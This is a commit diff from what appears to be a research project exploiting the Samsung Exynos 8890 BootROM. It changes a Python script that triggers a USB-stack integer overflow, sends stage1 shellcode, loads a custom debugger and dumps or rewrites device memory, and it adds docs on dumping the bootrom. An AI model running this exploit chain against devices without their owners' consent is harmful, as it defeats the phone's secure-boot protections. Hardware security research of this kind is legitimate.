changed exploit flow

documentation/source/BootROM_8890/boot_chain.rst

@@ -10,14 +10,20 @@ Current boot chain:
 
    Boot chain
 
+As done by Frederic, the bootrom can be dumped using his provided scripts, and can the be split into different boots:
+
+.. code-block:: bash
+
+    ./exynos-usbdl e payloads/Exynos8890_dump_bootrom.bin dumped_sboot.bin
+    scripts/split-sboot-8890.sh dumped_sboot.bin
+
 debugger
 ========
 Some other information about the debugger and it's current state.
 
 bl1
 ===
-
-Loads at address ``0x02024000`` and contains some form of header. 
+Loads at address ``0x02024000`` and contains some form of header (ramdump).
 There seems to be a samsung header format, where the first 4 bytes define the entry point of the binary. 
 In this case this entry is ``+0x10`` so we jump to ``0x02024010``.
 

source/exploit/.vscode/launch.json

@@ -5,21 +5,38 @@
     "version": "0.2.0",
     "configurations": [
         {
-            "name": "Debug exploit",
+            "name": "Debug usb stack",
             "type": "debugpy",
             "request": "launch",
             "program": "exploit.py",
             "console": "integratedTerminal",
-            "args": ["--debug"]
+            "args": ["--usb-debug"]
         },
         {
-            "name": "Run chain",
+            "name": "Run boot chain",
+            "type": "debugpy",
+            "request": "launch",
+            "program": "exploit.py",
+            "console": "integratedTerminal",
+            "justMyCode": false,
+            "args": ["--run-boot-chain"]
+        },
+        {
+            "name": "Debug on device",
             "type": "debugpy",
             "request": "launch",
             "program": "exploit.py",
             "console": "integratedTerminal",
             "justMyCode": false,
             "args": []
+        },
+        {
+            "name": "Debug current file",
+            "type": "debugpy",
+            "request": "launch",
+            "program": "${file}",
+            "console": "integratedTerminal",
+            "justMyCode": false,
         }
     ]
 }

source/exploit/exploit.py

@@ -1,4 +1,3 @@
-import usb.util, usb.core
 import struct, sys, usb1, libusb1, ctypes, usb, argparse
 from keystone import *
 from capstone import *
@@ -6,6 +5,7 @@ from ghidra_assistant.utils.utils import *
 from ghidra_assistant.concrete_device import *
 from ghidra_assistant.utils.debugger.debugger_archs.ga_arm64 import GA_arm64_debugger
 from qiling.const import QL_ARCH
+import os
 
 def p32(x):
     return struct.pack("<I", x)
@@ -45,6 +45,9 @@ ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)
 cs = Cs(CS_ARCH_ARM64, CS_MODE_LITTLE_ENDIAN)
 
 class ExynosDevice():
+    """
+    Class to exploit a Exynos device (8890/8895) using the USB stack.
+    """
 
     def __init__(self, idVendor=0x04e8, idProduct=0x1234):
         """Init with vendor/product IDs"""
@@ -53,9 +56,11 @@ class ExynosDevice():
         self.target = "8890"  # TODO auto detect device
         self.connect_device()
 
+
     def connect_device(self):
-        """Wait for proper connection to the device"""
+        """Setup proper connection, and ensure the connection is alive"""
         self.context = usb1.USBContext()
+
         while True:
             self.handle = self.context.openByVendorIDAndProductID(
                 vendor_id=self.idVendor,
@@ -65,13 +70,24 @@ class ExynosDevice():
             if self.handle == None:
                 continue
             break
-        print(f"Connected device! {self.idVendor} {self.idProduct}")
+
+        try: 
+            self.handle.getDevice().getSerialNumber()
+        except Exception as e:
+            if e.value == usb1.libusb1.LIBUSB_ERROR_TIMEOUT or e.value == usb1.libusb1.LIBUSB_ERROR_IO:
+                print("Device disconnected / not connected. Reconnect USB?")
+                sys.exit(0)
+            else:
+                raise e
+        print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
+
 
     def write(self, data):
         transferred = ctypes.c_int()
         res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
         assert(res == 0), "Could not perform bulk transfer"
         return res
+    
 
     def send_empty_transfer(self):
         transferred = ctypes.c_int()
@@ -79,11 +95,9 @@ class ExynosDevice():
         assert(res == 0)
         return transferred.value
     
+    
     def test_bug_2(self):
-        '''
-        Interger overflow in last packet if reamining size is 1.
-        '''
-        
+        """Interger overflow in last packet if reamining size is 1."""
         transferred = ctypes.c_int()
         bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
         bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
@@ -98,7 +112,6 @@ class ExynosDevice():
         res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
         while True:
             res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
-        pass
 
 
     def test_bug(self):
@@ -115,6 +128,7 @@ class ExynosDevice():
         
         print('Bug probably available')
         sys.exit(0)
+
         
     def send_normal(self, payload):
         '''
@@ -127,10 +141,13 @@ class ExynosDevice():
         assert res == 0, "Error sending payload"
         pass
 
+
     def exploit(self, payload: bytes):
         '''
         Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload. 
         '''
+        assert len(payload) <= MAX_PAYLOAD_SIZE, "Shellcode too big"
+
         current_offset = TARGET_OFFSETS[self.target][0]
         xfer_buffer_start = TARGET_OFFSETS[self.target][1] # start of USB transfer buffer
         transferred = ctypes.c_int()
@@ -140,6 +157,7 @@ class ExynosDevice():
         max_payload_size = 0x100000000 - size_to_overflow
         ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE) # 
         
+        # Assert that payload is 502 bytes
         # max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
         # max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200 
         payload = payload + ((max_payload_size - len(payload)) * b"\x00")
@@ -208,14 +226,34 @@ class ExynosDevice():
 
         #Overwrite all calls to make the concrete target function properly
         concrete_device.copy_functions()
+
     
-    def setup_debugger(self):
-        '''
-        Setup the debugger as a concrete device
-        '''
-        self.cd = ConcreteDevice(None, False)
-        self.cd.dev = self.setup_concrete_device(self.cd)
-        self.cd.test_connection()
+    def usb_debug(self):
+        """
+        Function to debug USB behaviour
+        """
+        transferred = ctypes.c_int()
+        # Send some data
+        count = 0
+        def _send_data():
+            transferred.value = 0
+            p = p32(count) + b"\xaa" * (0x200 - 4)
+            res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
+            assert res == 0, f"Error sending data ({res})"
+            
+        def _recv_data():
+            transferred.value = 0
+            buf = ctypes.c_buffer(b"", 0x200)
+            res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)        
+            assert res == 0, f"Error receiving data ({res})"
+            hexdump(buf.raw)
+        
+        # Should have received some bytes
+        while True:
+            _send_data()
+            _recv_data()
+            count += 1
+
         
     def dumb_interact(self):
         '''
@@ -225,15 +263,24 @@ class ExynosDevice():
         self.cd.arch_dbg.state.print_ctx()
         
         # Overwrite jump back
-        self.cd.memwrite_region(0x02020108, p32(0x2069000))
-        # self.cd.memwrite_region(0x020200e8, p32(0x2069000))
+        # self.cd.memwrite_region(0x02020108, p32(0x2069000))
+        # self.cd.memwrite_region(0x02021800, p32(0x2069000))
+        self.cd.memwrite_region(0x020200e8, p32(0x02069000)) # address, data. Writes 
         
         AUTH_BL1 = 0x00012848
         def memdump_try():
+            self.cd.arch_dbg.state.LR = 0x020200e8
+            self.cd.restore_stack_and_jump(0x02021810)
+            stack_pointer = 0x02021810
             dumped = b""
             for block in range(0x2020000, 0x2200000, 0x200):
+                stack_pointer += 0x200
+                self.cd.arch_dbg.state.print_ctx()
                 print(hex(block))
                 dumped += self.cd.memdump_region(block, 0x200)
+                if stack_pointer >= 0x02020F08:
+                    print(f'stack_pointer at {stack_pointer}')
+            return dumped
                 
         def auth_bl1():
             # Load the firmware
@@ -251,6 +298,8 @@ class ExynosDevice():
         # self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
         # self.cd.restore_stack_and_jump(0x00012814)
         # self.cd.restore_stack_and_jump(0x000125b4)
+
+        dumped = memdump_try()
         
         bl1 = open("../S7/bl1.bin", "rb").read()
         self.cd.memwrite_region(0x02024000, bl1)
@@ -265,6 +314,7 @@ class ExynosDevice():
             self.cd.arch_dbg.state.LR = 0x2069000
             self.cd.restore_stack_and_jump(0x02021810)
         bl31 = open("../S7/bl31.bin", "rb").read()
+
         self.cd.memwrite_region(0x02021800, bl31)
         jump_bl31()
         assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?"
@@ -276,14 +326,34 @@ class ExynosDevice():
         
         #authenticate it
         pass
+    
 
-    def run_boot_chain(self):
-        stage1 = open("stage1/stage1.bin", "rb").read()
-        self.exploit(stage1)
-        
-        def run_debugger():
-            # TODO, hardcoded path
-            debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
+    def setup_guppy_debugger(self):
+        """
+        Run the boot chain for the Exynos device.
+
+        Load and send stage1 payload - exploit (stage1)
+        """
+            
+        def _setup_debugger():
+            '''
+            Setup the debugger as a concrete device
+            '''
+            self.cd = ConcreteDevice(None, False)
+            self.cd.dev = self.setup_concrete_device(self.cd)
+            self.cd.test_connection()
+
+
+        def _initial_run_debugger():
+            """Write debugger to device and test basic functionality"""
+            if os.getenv("USER") == "eljakim":
+                debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
+            else:
+                try:
+                    debugger = open("../../dump/debugger.bin", "rb").read()
+                except Exception as e:
+                    print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
+                    sys.exit(0)
             debugger += ((0x2000 - len(debugger)) * b"\x00")
             assert len(debugger) == 0x2000, "Invalid debugger size, stage1 requires 0x2000 size"
             for block in range(0, len(debugger), 0x200):
@@ -296,57 +366,28 @@ class ExynosDevice():
             r = self.usb_read(0x200)
             assert r == b"PONG", f"Invalid response from device: {r}"
         
-        run_debugger()
-        self.setup_debugger()
-        
-        self.dumb_interact()
-        
-        
-
-def usb_debug():
-    '''
-    Function to debug USB behavior
-    '''
-    
-    shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
-    assert len(shellcode) <= MAX_PAYLOAD_SIZE, "Shellcode too big"
-    
-    exynos = ExynosDevice()
-    exynos.exploit(shellcode)
-    
-    transferred = ctypes.c_int()
-    # Send some data
-    count = 0
-    def send_data():
-        transferred.value = 0
-        p = p32(count) + b"\xaa" * (0x200 - 4)
-        res = libusb1.libusb_bulk_transfer(exynos.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, p, len(p), ctypes.byref(transferred), 100)
-        assert res == 0, "Error sending data"
-        
-    def recv_data():
-        transferred.value = 0
-        buf = ctypes.c_buffer(b"", 0x200)
-        res = libusb1.libusb_bulk_transfer(exynos.handle._USBDeviceHandle__handle, 0x81, buf, len(buf), ctypes.byref(transferred), 100)        
-        assert res == 0, "Error receiving data"
-        hexdump(buf.raw)
-        pass
-    
-    # Should have received some bytes
-    while True:
-        send_data()
-        recv_data()
-        count += 1
+        _initial_run_debugger()
+        _setup_debugger()
 
 
 if __name__ == "__main__":
     arg = argparse.ArgumentParser("Exynos exploit")
-    arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False)
-    
-    # Debug mode
+    arg.add_argument("--usb-debug", action="store_true", help="Debug USB stack", default=False)
+    arg.add_argument("--run-boot-chain", action="store_true", help="Run boot chain to boot different boot stages", default=False)
+    arg.add_argument("--dumb-debug", action="store_true", help="Live debugging on device", default=True)
     args = arg.parse_args()
-    if args.debug:
-        usb_debug()
-        sys.exit(0)
     
     exynos = ExynosDevice()
-    exynos.run_boot_chain()
+
+    if args.usb_debug:
+        shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
+        exynos.exploit(shellcode)
+        exynos.usb_debug()
+
+    elif args.run_boot_chain:
+        stage1 = open("stage1/stage1.bin", "rb").read()
+        exynos.exploit(stage1)
+        exynos.setup_guppy_debugger()
+        exynos.dumb_interact()
+        
+    sys.exit(0)